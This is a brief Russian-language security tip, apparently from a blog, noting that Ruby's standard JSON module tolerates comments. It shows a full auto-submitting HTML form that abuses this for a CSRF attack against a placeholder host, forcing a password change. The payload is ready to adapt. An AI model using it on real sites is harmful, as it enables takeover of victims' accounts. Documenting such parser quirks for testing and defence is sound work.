Ruby забавно парсит JSON стандартным модулем. В него можно писать комментарии!

Например, если серверная часть не проверяет Content-type запроса на application/json, можно сформировать сценарий для CSRF.



<body onload="document.forms[0].submit();">

<form action="https://visim" method="POST" enctype="text/plain">

<input type="hidden" name='{"action":"changepassword","password":"PwnMePls!1!!"}//' value="">

</form>

</body>